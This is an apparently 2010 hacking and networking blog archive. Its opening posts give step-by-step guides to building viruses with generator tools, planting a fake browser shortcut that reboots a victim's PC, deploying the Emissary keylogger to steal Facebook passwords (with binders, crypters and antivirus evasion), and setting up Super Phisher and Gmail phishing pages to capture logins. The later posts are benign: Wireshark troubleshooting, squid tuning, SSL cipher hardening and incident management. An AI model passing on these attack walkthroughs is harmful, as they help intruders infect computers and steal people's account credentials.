Wednesday, August 18, 2010

How to Create a Computer Virus

Here is the list of the softwares that allows you to make Virus:

1. In Shadow Batch Virus Generator

1. First of all download the virus maker from here

2. Run "In Shadow Batch Virus Generator.exe" application to see something like this:


3. You can use various options to make virus to suit your needs. You can:
  • Infect files of various extensions
  • Insert virus in startup menu, Kill various processes.
  • Disable all security services like Windows Defender, Antivirus, Firewall.
  • Rename file extensions, spread virus via file sharing.
  • Create new admin account, change user account password.
  • Block various websites, download trojan files to victim computer, shutdown victim computer and much more.

4. After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.

5. Now, you have your virus ready to hack your victim. This virus maker is undetectable by the most antiviruses.

I am not responsible for any action performed by you. Also, do not try this virus on your own computer. This virus software is one of the most efficient virus software used today.


2. JPS Virus Maker


This is also a great virus maker with many features in it. Check all the features of JPS Virus maker here.


3. TeraBIT Virus Maker


A powerful virus maker for you. Look for updates here

Download JPS Virus Maker and TeraBit Virus Maker.

These two virus makers are detected as a viruses by the most anti-virus softwares, but they won't harm your pc in any way. Before you run these virus makers disable your anti-virus temporarily.

Facebook Virus Prank - Making fun to your friend

In this post i'll show you an easy step by step tutorial about how to make a Facebook virus using simple commands on notepad. This will make the victims think that they have a virus when they click on an icon such as Internet Explorer or Mozilla Firefox...
This "virus" is totlly harmless and won't do any damage to your victims computer.
When a victim clicks on the icon he will get a warning message like "WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!". You can change the text to whatever you want. If you have some other interesting ideas, let me know. This virus doesn't do anything to your friends pc, but to see his scared face, that's something :)...

Now let's start with the tutorial:

1) Open notepad

2) Type the following text in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."



3) Save as Internet Explorer .bat
(or whatever you want, but be shure that the last letters are .bat)



4) Right click on Internet Explorer .bat and click Create Shortcut




5) Right click on shorcut and click Properties.



6)Click Change Icon



7) Choose Internet Explorer icon (or Mozilla Firefox, or any other icon similar to it), click OK , then click Apply



8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:




Hope you'll freak out friend(s).

If this prank was successful and there was some interesting reactions of your friends, feel free to share it with us.

How to Hack Facebook Password using Facebook Hacking Software

Hacking Facebook Account Password: Facebook Keylogging for Hacking Facebook

Everyday I get emails wherein my readers ask me How to Hack a Facebook Account? You as the reader are most likely reading this because you want to hack into someone’s facebook account. So in this post I have decided to uncover the real and working way to hack any facebook account. Actually there are many ways to hack someones facebook password like Phishing, Keylogging or using Hacking softwares used to hack facebook password. In this post i'm going to show you how to hack someones facebook account password using a keylogger - Emissary Keylogger.

How to Hack Facebook Password using Keylogger?


1. First of all Download Emissary Keylogger. It takes screenshots of the victim's computer and sends it to your gmail along with the logs.

2. Make sure that you have Microsoft .Net Framework installed in your Windows. You can download it from www.microsoft.com/net/. Else it won't work.

3. Extract the files using WinRar or any other zip/unzip program.

4. Open "Emissary.exe" to see something like this:



5. Now, fill in your Gmail username and password in respective fields (You can create a gmail account that you're going to use only for keylogging). Enter the email adress where you wanna receive facebook passwords. Choose a name for the server.exe file. You can set timer as you wish. This timer controls the time interval between two logs emails.

6. In the "Options" section you can see what this evil little buddy can do ;)
  • Block AV Sites: Blocks VirusScanning Websites on victim's computer
  • Add to Startup: Adds to Startup via Registry
  • Antis: Anubis, BitDefender, Kaspersky, Keyscrambler, Malwarebytes, NOD32, Norman, Ollydbg, Outpost, Wireshark
  • Disable TaskManager: Disable TaskManager on victim's PC
  • Disable Regedit: Disable's Regedit on victim's PC

7. Check "Trojan Downloader" to Downloade and Execute a trojan on victim's PC. You can also create a fake error message and scare your victim, like:


8. After you're done, hit on "Build" and you will get server keylogger file created in current directory.

9. Now, to hack facebook password, you have to send this server file to victim and make him install it on his computer. You can use Binder, Crypter or Fake Hacking Software to bind this server file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge.

10. Now because this is a server.exe file you can't send it via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediafire, Speedyshare, Ziddu.com, etc.

11. Once the victim runs our sent keylogger file on his computer, it searches for all stored passwords and send you email containing all user-ids and passwords, like:


Now you have all victim email passwords in your inbox and you can now hack victim facebook accounts easily. I have personally tested this free keylogger and found it working 100%. Enjoy Hacking.


Very Important: Do not scan these tools on VirusTotal. Use http://scanner.novirusthanks.org and also check the "Do not distribute the sample" option.

How to Create Your Own Phisher to Hack Any Website Account Password

Previously i've posted how to hack websites using phishing, like eBay, Gmail and Facebook. Here i want to show you how to make a phishing page using a Phishing Creator - Super Phisher and get account information for various websites from many people. Тhis is the easyest and also a very effectively way to make a phisher and hack any website account password.

Here are some features of Super Phisher:
  • Fastest phisher maker tool ever
  • Makes phisher for almost any site
  • Useful for users who dont knows HTML, PHP coding
  • No manual work except entering URL of website, for which u want to make phisher
  • Fully automated tool
  • Small in size.
  • Instant access to phishers you created.

For example i will show you how to make a phishing site of Lockerz.com.

Here is a step by step guide to hack any website account password using phishing creator tool:

1. First of all download Super Phisher here.

2. In "Super Phisher" folder, open "Super Phisher.exe" file to get something like:


3. Now, in "URL of Login Page", enter http://www.lockerz.com. This is the site you wanna hack.

4. In "Name of Log File" write password.txt or whatever you like. This is the place where all typed id and password are stored. In "Name of PHP File" also type anything you like, e.g. lockerz.php or login.php...

5. In field of "Site redirect to", enter http://www.lockerz.com/myLocker, so that victim is redirected to original Locker site when he enters his email and password.

6. Click on "Build Phisher" and you will get Lockerz phisher created in "Output" folder in current directory.

7. Upload all of the phisher files to any free webhost site like:
8. Once you have uploaded the files in the directory, send this phisher link to your victim and make him login to his Lockerz account using your sent Phisher.

9. Once he logs in to his Lockerz account using Phisher, all his typed email and password is stored in "password.txt".


10. Now you can see password in this .txt file and hack Lockerz account password.


Super Phisher is just awesome software to hack Lockerz account password. This software not only is used to hack Lockerz account password, but also can hack orkut, gmail, yahoo, myspace and many other emails.

How To Hack Gmail Account Password




How to hack gmail account password:

1. First of all download Gmail Phisher

2. The downloaded file contains:
  • gmail.html
  • log.txt
  • mail.php
3. Upload all of the files to any free webhost site like:
4. Once you have uploaded the files in the directory, send this phisher link (gmail.html) to your victim and make him login to his Gmail account using your sent Phisher.

5. Once he logs in to his Gmail account using Phisher, all his typed Gmail id and password is stored in "log.txt".


6. Now, open log.txt to get hacked Gmail id and password as shown.


That's it, very simple. Now you have your victim's Gmail id and password hacked.


How it works ?


When a user types a Username Password in the the text box,The info is sent to "login.php" which acts as a password logger and redirects the page to "LoginFrame2.htm" which shows "There has been a temporary error Please Try Again" in it . So when the person clicks on try again it redirects to the actual URL so that the victim does not know that yoursite is a fake site and gets his gmail.com password hacked.

Tuesday, August 17, 2010

Identifying Slow Server Response at Packet Level (by Chris Greer)

Why is tracking down a server performance problem so difficult? First, it can be hard to dig through thousands of packets to find a solid example of a slow response. Once a slow response is isolated, identifying the root cause can also present a challenge. In this tip, we will show how to isolate a slow response from a server, filter on it, and determine if the root cause is the network or the server itself.

• Start at the client end

Often, when first analyzing a slow application, it is easiest to start at the client end. Although the problem may not be fully understood until a capture is taken at the server end, the trace file will be much simpler and easier to read when only one client experience is captured. Make sure that while capturing, the user is able to reproduce the performance problem.

• Look for client connecting to server

Look through the trace file to find where the client initiates a DNS query for the slow application server. It may be that they already have this server in their DNS cache, in which case the client may simply send a TCP SYN directly to the application server. If DNS is used, make sure that the DNS response time is low using the time column your packet analyzer.

-Note: When measuring application response, be sure to use a delta timer that shows the amount of time between packets. This can be accessed in Wireshark from the View drop-down menu.


F1

If the DNS response time is quick (it should not be longer than 150ms or so), the client will next send a connection request to the application server. This will be a TCP SYN packet, the first in the TCP three-way handshake. Use a TCP Stream filter to isolate this connection (right click on any packet in the TCP connection, select TCP Stream Filter). The goal in isolating this connection is to compare the network roundtrip time to the server response time.

Once this connection is isolated, look at the delta time between the TCP SYN sent by the client and the TCP SYN-ACK sent back from the server. This can be used as a benchmark connection setup time. In the picture below, the response from the server is displayed in packet 7. It took 134msec to hear back from the server.


F2


• Measure application response time – compare to connection setup time

Next, after the TCP connection has been established, the client will request data from the server. In the web-based application above, the client performs an HTTP GET. Use the delta time column to see how long it takes the server to respond to this request. In our example above, the server responds after 125msec with a TCP ACK. This indicates that the server received the request, but has not yet responded with actual data. After waiting 4.85 SECONDS, the server finally sends a packet with application data. After this, packets are flying by at wire-speed. Comparing 4.85 seconds to the connection setup time, 134msec, we see that the server response time is very slow.


• Server, client or network delay?

From this information, it is simple to determine where to troubleshoot next. If the server response time is significantly higher than the connection setup time, and there are no TCP retransmissions, the problem is on the server end. In the case above, the server responded to the request with an ACK, showing it received the request and was busy processing it. The network is not to blame for this delay.
If any retransmissions are observed, the network is dropping packets somewhere. The server may not be to blame for slow performance, especially if it isn’t getting requests in the first place.


• If no delay is observed in this transaction ...

Move to the next request, keeping an eye on the amount of time it is taking for the server to respond to requests. Always use the connection setup time as a benchmark network roundtrip timer. This may take some time to do packet by packet, but since the capture was taken client-end, this is an excellent way to get familiar with the application behavior and look for patterns in client requests.

Once you get a good feel for the requests involved in this application, the analyzer can be moved to the server end – this way you can look for packets that are being sent during the slow requests. In the example above, we would be interested in what the server is busy doing during the 4.85 seconds of delay. Is a downstream server being called? Is a DNS request timing out?

Getting started in analyzing a slow application is sometimes the hardest step. By starting at the client, reproducing the problem, carefully watching TCP connection setup time, and comparing this with server response time, you can narrow down on which requests are slow and identify the root cause. Even if the problem cannot be determined at the client end, you will have an idea on what the next step in troubleshooting will be, whether to focus on the network or server.


Monday, August 16, 2010

Mapping Physical Jacks to Switch Ports


F1


Chris' Quick Tip: Mapping Physical Jacks to Switch Ports

How can we use Wireshark to save time in physical layer management - a 5 Minute Solution



In this quick tip we will show how to use the Cisco Discovery Protocol or the Link Layer Discovery Protocol to determine what switch, port, and VLAN we are connected to on the network. From time to time when we are troubleshooting a problem we need to know what port corresponds to the wall jack we are snapped into. In many cases, switch connectivity to the desktop is either poorly documented or out of date. Using these protocols, we can see where we are connected within a few seconds.

This tip will only work on networks where CDP or LLDP are enabled. Many switches come with this feature enabled, but in some environments these protocols are disabled.


  1. First, connect a laptop with Wireshark installed to the wall or office jack you wish to document.
  2. Fire up the analyzer and capture either 60 seconds of traffic, or until you see the CDP or LLDP packet roll by on the screen. By default, CDP is transmitted every 60 seconds. Type CDP in the display filter bar and apply.
  3. F2

  4. In the summary view, we can quickly see what switch and port we are connected to. If this is not enough information, we can look further into the CDP details by expanding this field.
  5. F3

Here we can see the switch, port, duplex, VLAN, switch IP, and platform of the device we are connected to. If an LLDP packet is caught (typically on non-Cisco switches) similar information will be displayed.

Using this packet we can quickly determine where we are plugged into the network, saving us time in updating documentation and troubleshooting end user connectivity problems.

Tối ưu hóa

Với những hệ thống lớn của các công ty tài chính, chứng khoán, ngân hàng.... việc tối ưu thực hiện cụ thể trên từng "tier". Ví dụ, bên ngoài vào trong, network tier nếu không có QoS cụ thể và packets ra vào tràn lan thì không thể nào bảo đảm chất lượng truyền tải, dẫn đến những trì trệ chồng chất. Tiếp đến là những ứng dụng / thiết bị như firewall, reverse proxies... nếu không kiện toàn thì hiệu suất bị giảm vì bước qua mỗi chặng là bị giảm vận tốc truy cập. Đi vào đến tầng web, nếu không tối ưu đúng mức, số lượng connection được dùng bị thiếu hoặc thời gian cho phép được duy trì xuất truy cập quá dài không cần thiết khiến tài nguyên bị thiếu hụt, dẫn tới tình trạng trì trệ. Trong tầng application bên trong, nếu coding không hữu hiệu và không tối ưu đúng mức sẽ tạo tình trạng kém hiệu suất và "nuốt tài nguyên" nghiêm trọng. Những thứ đơn giản như database connection pool nếu không "tune" cho đúng mức cũng sẽ tạo tình trạng kém hiệu suất một cách nghiêm trọng.

Xét tổng quát cho các tiers thì:
network BW --> router --> FW --> proxies --> web --> app --> database --> storage

Mỗi tầng có thể có một hoặc nhiều thiết bị song song và có đòi hỏi khác nhau.

Nói chung, nguyên tắc optimization áp dụng cho mỗi tầng xuyên suốt trong kiến trúc của một hệ thống. Mỗi optimization khác nhau (vì có tính chất và vai trò khác nhau) nhưng đều có chung mục đích:
- Nhanh.
- Bền.
- Bảo mật.

Thursday, August 12, 2010

10 Awesome Examples for Viewing Huge Log Files in Unix

http://www.thegeekstuff.com/2009/08/10-awesome-examples-for-viewing-huge-log-files-in-unix/

Sunday, August 8, 2010

Squid cache chậm

squid cache bị chậm thường do I/O trên disk cache mà ra. Để gia tăng vận tốc, nên trải disk cache ra nhiều thư mục khác nhau nằm trên nhiều đĩa khác nhau (để gia tăng băng thông). Thay vì:
cache_dir ufs /path/to/cache 500000 16 256

nên chẻ nó ra:
cache_dir ufs /path/to/cache1 100000 16 256
cache_dir ufs /path/to/cache2 100000 16 256
cache_dir ufs /path/to/cache3 100000 16 256
cache_dir ufs /path/to/cache4 100000 16 256

Khi mount các partition trên, nên sử dụng noatimenodfratime options. Nếu hệ thống squid này an toàn và không có ai sử dụng (không access trực tiếp) thì nên thêm noxattr. Những cái này sẽ gia tăng hiệu suất cho disk cache. nếu được, nên dùng ReiserFS thay vì ext3 cho disk cache.

Ngoài ra nên chỉnh các directives:
maximum_object_size
minimum_object_size
maximum_object_size_in_memory

cho thích hợp. Không phải cái gì cũng cache thì tốt.

Nên set giá trị max_open_disk_fds cho thích hợp thay vì để mặc định nếu có vấn đề với disk I/O bởi vì nếu set 0 (unlimited) mà ulimit lại ấn định thấp hơn thì sẽ khiến squid bị trì trệ. Trên OS level, nên set file descriptor lên ít nhất là 8192 và nên áp dụng cùng giá trị này cho max_open_disk_fds.

Friday, August 6, 2010

Top 5 undiscovered vulnerabilities found on enterprise networks

A report by Lumeta highlights the five most prevalent undiscovered or unknown vulnerabilities commonly found on enterprise networks.


1. Incorrect or incomplete deployments of IPS/IDS. 88 percent of enterprise networks display network segments that are not properly monitored or protected by an IPS/IDS.

2. Failure to discover and probe all segments of a network with vulnerability management tools. 76 percent of organizations using vulnerability management tools were inadvertently doing so on only a subset of their network segments.

3. Overlooking non-traditional IP-enabled devices. The third most common overlooked vulnerability was that posed by non-traditional IP-enabled devices, such as smart phones, building controls, ATMs, POS devices, and medical equipment. When devices are network connected, but are not managed or monitored by the tools IT uses to maintain the network, they can provide an “unsupervised” ingress or egress on the network.

4. Using default credentials on network devices. Though other reports have indicated exploits in this area are becoming less frequent, 50 percent of enterprises still have default credentials on network infrastructure equipment prior to using network discovery.

5. Unauthorized wireless access points (WAPs). The final overlooked security loop hole to make the report is the presence of unauthorized WAPs. Rogue WAPs which have been responsible for some of the largest data breaches in history, are still discovered on nearly 30 percent of enterprises in 2009.

“One need only look at the very real costs incurred by companies that have suffered major data breaches or operational downtime to understand what’s at risk,” said Lumeta COO Michael Markulec. “We’ve begun publishing these most commonly discovered vulnerabilities because, once detected, they’re all easily remedied. The reason these security gaps can be exploited isn’t because we don’t have the tools to fix them, it’s because they are often undiscovered or unknown.”


Thursday, August 5, 2010

How to change SSL Windows ciphers Strength The remote service supports the use of weak SSL ciphers

If you deal with Credit Cards on the Internet, then it is very likely that you will have to conform to the Payment Card Industry Data Security Standards (PCI-DSS). You can get the standards specification, the self assessment questionnaire, or find instructions on exactly what you need to do to conform on the PCI-Security Standards Council website.

Depending on the nature of your business, and indeed how much money you see, you may need to perform network vulnerability assessments every quarter. These assessments are performed against the servers hosting your ‘payment application’ ie. your web server.

You will find a complete list of all companies that are recognised by the PCI on their website here (PDF) and most will offer some kind of free limited network assessment (such as 5 free scans for up to 3 IPs per device)

So, you’ve run your network vulnerability assessment on your IIS6 server. Great. But now you received a “NOT COMPLIANT” report as a result of failing the following two tests:

  • “Deprecated SSL Protocol Usage”
  • “Weak Supported SSL Ciphers Suites”

Let’s look at each one in turn and how to solve them.

Deprecated SSL Protocol Usage - The remote service encrypts traffic using a protocol with known weaknesses

The report may also give you the following information to put the fear of your god into you - “The remote service accepts connections encrypted using SSL 2.0, which reportedly suffers from several cryptographic flaws and has been deprecated for several years. An attacker may be able to exploit these issues to conduct man-in-the-middle attacks or decrypt communications between the affected service and clients.”

You can confirm the reports findings by typing your hostname or IP into this handy utility - http://www.serversniff.net/sslcheck.php which will generate a report such as the picture below

image

The report is showing you that both SSL2 and SSL3 are enabled, and all the ciphers currently exposed by the server.

OK- So we want to remove SSL2 from this list. Unfortunately the only fix I know for this is by modifying some keys in your registry. There is a Microsoft Support article (187498) herewhich describes the following registry modifications.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Server]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0\Server]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server]
"Enabled"=dword:ffffffff
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Server]
"Enabled"=dword:ffffffff


What is happening here is that you are explicitly turning off PCT 1.0, SSL 2.0 and explicitly turning on SSL 3.0, TLS 1.0.

Running the report again on http://www.serversniff.net/sslcheck.php should present results something like below:

image

Right, now lets get rid of those weak ciphers.

Weak Supported SSL Ciphers Suites - The remote service supports the use of weak SSL ciphers

Again, another hard hitting description may be given - “The remote host supports the use of SSL ciphers that offer either weak encryption or no encryption at all”

OK. Here’s registry fix number 2.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\NULL]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 128/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 56/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 128/128]
"Enabled"=dword:ffffffff
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 64/128]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\Triple DES 168/168]
"Enabled"=dword:ffffffff


This time we are explicity turning off the ciphers identified in the Network Vulnerability report, leaving only the strong ones switched on.

Running the http://www.serversniff.net/sslcheck.php report again shows a completely new picture:

image

NOTE: I do hope this post helps you out but please note that I do not accept any responsibility for your actions. This post details what worked for me, YMMV. Take care, Backup first, and don’t blame me if it goes pear shaped. As Microsoft Support says :

Important This post contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:

322756 How to back up and restore the registry in Windows


http://geekswithblogs.net/dchristiansen/archive/2009/03/24/pcidss-disablessl2andweakciphersoniis6.aspx

http://msdn.microsoft.com/en-us/library/aa374757%28VS.85%29.aspx

http://support.microsoft.com/kb/245030/en-us

http://infocenter.sybase.com/help/index.jsp?topic=/com.sybase.help.ase_15.0.sag1/html/sag1/sag1884.htm


Tuesday, August 3, 2010

Giải quyết sự cố ...

Trong một buổi họp, giám đốc kỹ thuật đưa ra một vấn đề như sau:

Vừa qua, trong quá trình thực hiện penetration test hàng năm cho hệ thống khảo giá của chúng ta, một số lỗi nghiêm trọng được tìm thấy trong cơ chế xác thực danh tính và gán quyền cho tài khoản. Những lỗi bảo mật này đã được cảnh báo đến công ty cung cấp phần mềm. Tuy nhiên, sau khi nghiên cứu, họ cho biết họ không thể giúp được gì vì cách khai triển đi ra ngoài giới hạn và đề nghị của họ. Nếu muốn họ giúp, cơ chế này phải được thay đổi theo thiết kế họ đưa ra và chi phí của việc làm này sẽ không nhỏ. Trở ngại lớn nhất ở đây là vấn đề thời gian vì tháng sau công ty phải ra mắt một sản phẩm mới trên hệ thống khảo giá. Quy trình thay đổi và kiểm nghiệm cơ chế xác thực danh tính và gán quyền này cần ít nhất là hai tháng để thực hiện và không có cách gì rút ngắn lại được bởi vì nó đòi hỏi phải điều chỉnh lại mã nguồn và thiết kế lại cơ sở hạ tầng liên quan đến cơ chế này.


Sau khi xong cuộc họp, tay "Problem Manager" liền triệu tập một cuộc họp thứ nhì để hình thành một cái gọi là "collaboration team". Nhóm này bao gồm đại diện của tất cả các tầng kỹ thuật (như network, security, middleware, DBA, midrange, developers, testers...). Nhóm này được tạo ra nhằm mục đích hình thành một "white boarding session" (nhóm tập họp lại trong một phòng họp có bảng trắng) để đưa ra tất cả các giải pháp có thể nghĩ ra được.

Sau khi mười mấy "giải pháp" được đưa ra, từ ngớ ngẩn nhất (vì không đủ thời gian và tiền bạc để thực hiện) cho đến khả thi nhất được hình thành, tất cả thành viên của nhóm đi xuyên qua giai đoạn thẩm định (assessment) và cho điểm mỗi giải pháp (với thang điểm từ 1 đến 10 chẳng hạn với 1 là ít khả thi và 10 là khả thi nhất). Bốn giải pháp có điểm cao nhất được chọn ra để đi đến chỗ "cãi lộn" nhằm chọn ra hai giải pháp khả thi nhất cho ngắn hạn và dài hạn (nên nhớ, nhóm này toàn là những tay nắm vững các tầng kỹ thuật chớ không lơ tơ mơ).

Sau khi hình thành khung của giải pháp, nhóm bắt tay vô thực thi ngay. Bởi vì các thành viên của nhóm có quyền thay đổi và điều chỉnh ở khu vực kỹ thuật của mình nên cần thực thi ở bất cứ tầng nào cũng xảy ra nhanh chóng (chớ không còn chờ đợi được thực thi như hoàn cảnh bình thường nữa). Mỗi lần thực thi như vậy được xem là đi xuyên qua 1 "iteration" (1 vòng). Công ty anh áp dụng "agile principle" nên tất cả quy trình thảo luận và thực thi xảy ra rất nhanh. Thậm chí, kéo nhau vô phòng họp, mỗi đứa mang theo laptop của mình và thực hiện ngay tại chỗ các thay đổi (tất nhiên chỉ thực hiện trên hệ thống thử nghiệm chớ không phải trên hệ thống production đang hoạt động).

Problem Manager có trách nhiệm thu thập các ghi chú kỹ thuật của từng cá nhân trong nhóm để hình thành "action plan" cho production system sau này và mỗi cá nhân phải có trách nhiệm tự "take notes" và viết tài liệu chuyên biệt cho phạm vi của mình. Xuyên qua mỗi iteration, những thiếu sót hoặc những chi tiết chưa hoàn chỉnh phải được điều chỉnh cho hoàn chỉnh.

Kết quả, giải pháp được áp dụng vào hệ thống production trước thời hạn 1 tuần. Giải pháp ngắn hạn, rẻ tiền nhất và nhanh nhất đã được chọn là thay thế hai con IBM HTTP server chạy trên AIX bằng hai con RHEL 5.x chạy trên 2 virtual machine (vmware) và Apache 2.2.x được cài với mod_security để áp dụng cản lọc nhờ khả năng "transformation" của nó. Giải pháp dài hạn là coding lại application để tiếp nhận và kiểm soát giá trị của cookies / sessions một cách chặt chẽ trước khi "xi nhan" cơ chế authentication / authorisation cho phép xuất truy cập tiếp tục. Chi tiết kỹ thuật thì khá phức tạp bởi vì một application có thể có nhiều "context" và mỗi context trỏ đến một hệ thống khác nhau có chức năng và thông tin khác nhau. Để các hệ thống A, B, C, D.... đều bảo đảm user session X là có giá trị thì chúng phải thông tin và kiểm chứng với nhau dựa trên các điều kiện bảo mật cụ thể.

Điều cần nói ở đây là cách tổ chức và xử lý vấn đề của từng tổ chức doanh nghiệp có thể khác nhau. Nếu sự cố được đưa ra vẫn không khắc phục và kỳ hạn phải tung ra một sản phẩm mới không thể thay đổi được (vì nó quyết định thắng thua bạc triệu) thì bằng mọi cách phải khắc phục. Nếu không khắc phục mà một khách hàng nào bị "dính chấu" thì coi như sản phẩm và chiến dịch ấy hỏng bét. Uy tín của cty cũng trôi xuống sông, xuống biển. Việc hình thành một nhóm "response" để làm việc dedicated và liên tục trong 3 tuần là việc không đơn giản vì chi phí không nhỏ. Tuy nhiên, nếu xét thấy chi phí này chiếm một tỉ lệ không lớn so với doanh thu (theo dự tính) thì không có lý do gì mà không tiến hành hết.